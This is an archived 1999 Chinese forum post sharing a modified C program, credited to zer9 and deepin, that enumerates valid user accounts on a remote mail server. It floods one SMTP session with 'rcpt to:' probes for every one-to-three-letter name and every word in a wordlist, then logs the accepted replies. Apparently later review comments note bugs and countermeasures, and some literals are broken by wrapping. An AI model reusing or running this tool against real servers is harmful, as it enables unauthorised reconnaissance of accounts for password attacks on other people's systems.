

主题:改了一下zer9的rcpt.c,zer9不介意吧?:)
发信人: deepin()
整理人: williamlong(1999-05-14 17:16:41), 站内信件
对zer9的rcpt.c小小修改了一下,zer9不会介意吧? :-)
虽然用暴力法,不过也不要太暴力了,呵呵.
所以我把循环改成了3位,主要靠用户名字典来猜,其实命中率也是
很高的.不然按照zer9的一秒猜一个,就算是4位,也要130个小时.虽然
可以用多线程加快速度,可惜我还不会写 :( 本来还想把rcpt.log
整理输出成用户名文件,可惜我太懒了 :)) RedHat5.2下通过.

       /* 通过"rcpt" 获得远程主机上的用户列表->/etc/passwd 
        *  thr0ugh "rcpt" gain rem0te server's user list   
        *                       by                                
        *                      zer9 
        *              Small modify by deepin
        *                 [email protected] 
        *            [email protected] 
        *      test on:slackware 2.0.34&irix6.4&Redhat5.2
        *               cc rcpt.c -o rcpt 
        *         后台运行:nohup ./rcpt <Target>& 
        * thanks zer9, he wrote the main program and I only modified a little :-)
        */     
                        
       #include <stdio.h> 
       #include <stdlib.h> 
       #include <string.h> 
       #include <netinet/in.h> 
       #include <sys/types.h> 
       #include <sys/stat.h> 
       #include <sys/time.h> 
       #include <fcntl.h> 
       #include <netdb.h> 
       #include <unistd.h> 
       #include <sys/socket.h> 
       #include <signal.h> 
       #include <ctype.h> 
       #include <arpa/inet.h> 

       /* TCP port the session connects to; main() stores it in sin_port via htons(). */
       #define  SMTPPORT   25 
       /* Version string printed in the usage line and in the log banner. */
       #define  VERSION     "0.081" 
       /* Log path, relative to the working directory; main() opens it with "a+". */
       #define  LogFile    "./rcpt.log"
       /* Argument to alarm() around each send/receive exchange, in seconds. */
       #define  TIMEOUT    200 
       /* Argument to sleep() between sending a command and reading the reply. */
       #define  SleepTime  1 

       /* Forward declarations; both functions are defined after main(). */
       int ver(void); 
       int look_up(int sock,char *string,char *buff); 
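       /*
        * Send one command line on a connected socket.
        *
        * Copies `string` into a fixed 100-byte buffer, appends a single '\n'
        * (no '\r') and transmits the result with send().
        *
        * The copy is bounded by the buffer size.  The earlier version used
        * strncpy() with strlen(string) as the limit, which is the length of
        * the source rather than of the destination, so any input of 100 bytes
        * or more wrote past the end of sendbuf on the stack.  Input that does
        * not fit is now truncated to 98 bytes before the newline is added.
        *
        * sock:   connected stream socket descriptor
        * string: NUL-terminated text to send, without a line terminator
        *
        * Returns 0 in every case; the result of send() is not reported.
        */
       int writeln(int sock,char *string) 
       { 
        char sendbuf[100]; 
        size_t len = strlen(string); 

        /* Keep one byte for '\n' and one for the terminating NUL. */
        if(len > sizeof(sendbuf)-2) 
         len = sizeof(sendbuf)-2; 

        memcpy(sendbuf,string,len); 
        sendbuf[len] = '\n'; 
        sendbuf[len+1] = '\0'; 

        send(sock,sendbuf,len+1,0); 
        return 0; 
       }  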

       /* Socket descriptor for the single SMTP session; assigned in main(). */
       int s; 
       /* fp: log stream opened on LogFile in append mode (written by main, ver, look_up).
        * wfp: wordlist stream opened read-only on argv[2]. */
       FILE *fp,*wfp;

       /*
        * Entry point: probes recipient names over one SMTP connection.
        *
        * argv[1] is the target host (name or dotted quad) and argv[2] a file of
        * whitespace-separated candidate names.  The program opens ./rcpt.log
        * for append, connects to TCP port 25, sends "help", "RSET",
        * "HELO default" and a "mail from:" line, then sends "rcpt to: <name>"
        * for every lowercase name of length 1, 2 and 3 and for every word read
        * from the list.  look_up() appends each reply containing "ent ok" to
        * the log.
        *
        * Seen from the mail server this is a single session carrying
        * 26 + 676 + 17576 RCPT commands plus one per wordlist entry, each at
        * least SleepTime (1) second apart, after a HELO of "default".
        * Per-session limits on rejected recipients, and replies that do not
        * distinguish known from unknown recipients, are the usual
        * countermeasures.
        *
        * Returns 0 after a complete run and -1 on a usage or setup error.
        *
        * NOTE(review): recv() is always called with sizeof(recvbuf), so a reply
        * that fills all 1000 bytes leaves recvbuf without a terminating NUL and
        * the following fprintf("%s")/strstr() read past the array.  Most recv()
        * results are not checked, so a closed connection does not stop the loops.
        */
       int main(int argc,char *argv[]) 
       { 
        struct sockaddr_in sin; 
        struct in_addr Target; 
        struct hostent *he; 
        /* NOTE(review): j is never used in this function. */
        char j; 
        /* NOTE(review): word holds 9 characters plus NUL; the fscanf("%s")
         * calls near the end of main do not limit the field width. */
        char recvbuf[1000],rcpt[200],a[8],hello_Target[500],word[10]; 

         
        if(argc!=3) 
         { 
          /* The literal below is split over two lines by the page's line
           * wrapping and its address is masked; it does not compile as shown. */
          printf("Rcpt %s   by zer9[FTT]&deepin  mailto: [email protected]
\n",VERSION); 

          printf("Usage: %s <Target> <WordlistFile> \n",argv[0]); 
          return -1;  
         } 
        /* Open the log for append; it is created if missing ("a+"). */
        if((fp=fopen(LogFile,"a+"))==NULL) 
        { 
         perror("fopen"); 
         return -1;  
        } 
        /* Open the wordlist.  NOTE(review): fp stays open on this error path. */
        if((wfp=fopen(argv[2],"r"))==NULL)
        {
         perror("fopen");
         return -1;
        }
        /* Resolve the target: try it as a host name first, then as a dotted quad. */
        if((he=gethostbyname(argv[1]))!=NULL) 
        { 
         bcopy(he->h_addr,(char *)&Target.s_addr,he->h_length); 
        } 
        else 
         Target.s_addr=inet_addr(argv[1]); 
        /* -1 is the failure value of inet_addr().  NOTE(review): perror() prints
         * errno, which gethostbyname() does not set, so the message text may be
         * unrelated to the failure. */
        if(Target.s_addr==-1) 
         { 
          perror("gethostbyname"); 
          return -1;  
         } 
         /* Write the banner and the target name to the log. */
         ver(); 
         fprintf(fp,"@Target: %s   ",argv[1]); 
         if((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
perror("sock");
return -1;
}
/* Connect to port SMTPPORT on the resolved address. */
sin.sin_family=AF_INET;
sin.sin_port=htons(SMTPPORT);
sin.sin_addr.s_addr=Target.s_addr;
if(connect(s,(struct sockaddr*)&sin,sizeof(sin))<0)
{
perror("connect");
return -1;
}
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
bzero(a,sizeof(a));
/* Separator line; the literal is split over three lines by page wrapping. */
fprintf(fp,"==================================================
=======
======\n");
if(recv(s,recvbuf,sizeof(recvbuf),0)<0) /* read the server greeting */

{
perror("recv");
return -1;
}
fprintf(fp,"%s\n",recvbuf);
/* Ask for the command list and log the reply.
 * NOTE(review): recvbuf is not cleared before this recv(), so bytes of a
 * longer previous reply can remain after the new data. */
writeln(s,"help");
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
if(strstr(recvbuf,"RCPT")==NULL) /* stop unless the help text mentions RCPT */
{
/* NOTE(review): perror() appends the text for the current errno, which is
 * unrelated to this condition. */
perror("no RCPT command. exit...");
return -1;
}
fprintf(fp,"------------------------------------\n");
bzero(recvbuf,sizeof(recvbuf));
writeln(s,"RSET");
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
/* Greeting sent to the server is the fixed string "HELO default". */
strcpy(hello_Target,"HELO ");
strcat(hello_Target,"default");
writeln(s,hello_Target);
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
bzero(recvbuf,sizeof(recvbuf));
/* Envelope sender for the session; the address in the literal is masked on
 * this page.  Original comment: ma1l fr0m: zer9@fbi.gov */
writeln(s,"mail from: [email protected]");

recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
fprintf(fp,"------------------------------------\n");

/* 1-character names, 'a'..'z'.
 * In each loop below alarm(TIMEOUT) arms a 200-second timer around the
 * exchange and alarm(0) cancels it.  No SIGALRM handler is installed in the
 * code shown, so an expiry would take the signal's default action. */
for(a[0]='a';a[0]<='z';a[0]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
/* Rewrites a[0] in place and puts the terminating NUL at a[1]. */
sprintf(a,"%c",a[0]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}

/* 2-character names, "aa".."zz" */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c",a[0],a[1]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 3-character names, "aaa".."zzz" */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c",a[0],a[1],a[2]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}

/* Names read from the wordlist file, one whitespace-separated word at a time.
 * NOTE(review): "%s" has no field width, so a word of 10 or more characters
 * overruns word[10]; a bounded conversion such as "%9s" would prevent that.
 * The feof() test after the read also means a final word that is not followed
 * by whitespace is dropped. */
fscanf(wfp,"%s",word);
while(!feof(wfp))
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
strncat(rcpt,word,strlen(word));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
fscanf(wfp,"%s",word);
}

/* Closing separator (literal split by page wrapping), then release the
 * socket and both streams. */
fprintf(fp,"==================================================
=======
====\n");
fprintf(fp,"okay!\n\n\n\n\n");
close(s);
fclose(wfp);
fclose(fp);
return 0;
}


/*
 * Record a server reply when it reports an accepted recipient.
 *
 * buff is searched for the substring "ent ok" (the original author notes that
 * sendmail 8.8.7 answers "Recipient ok"); a matching reply is written
 * verbatim to the log stream fp.  The stream is flushed on every call,
 * whether or not anything was written.
 *
 * sock and string are accepted but not used.
 * Returns 0 in every case.
 */
int look_up(int sock,char *string,char *buff)
{
    const char *accepted = strstr(buff, "ent ok");

    (void)sock;
    (void)string;

    if (accepted != NULL) {
        fprintf(fp, "%s", buff);
    }

    fflush(fp);
    return 0;
}

/*
 * Write the log banner: a row of '#' characters followed by the tool name,
 * VERSION and the authors' contact line, all to the log stream fp.
 * main() calls this after fp has been opened.  Always returns 0.
 *
 * NOTE(review): the second format string is split across lines by the page's
 * wrapping and its address is masked, so it does not compile as shown.
 */
int ver(void)
{
fprintf(fp,"\n###############################\n");
fprintf(fp,"Rcpt %s by zer9[FTT]&deepin mailto: [email protected]
om\n",VERSION)
;
return 0;
}

--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.103.32.93]
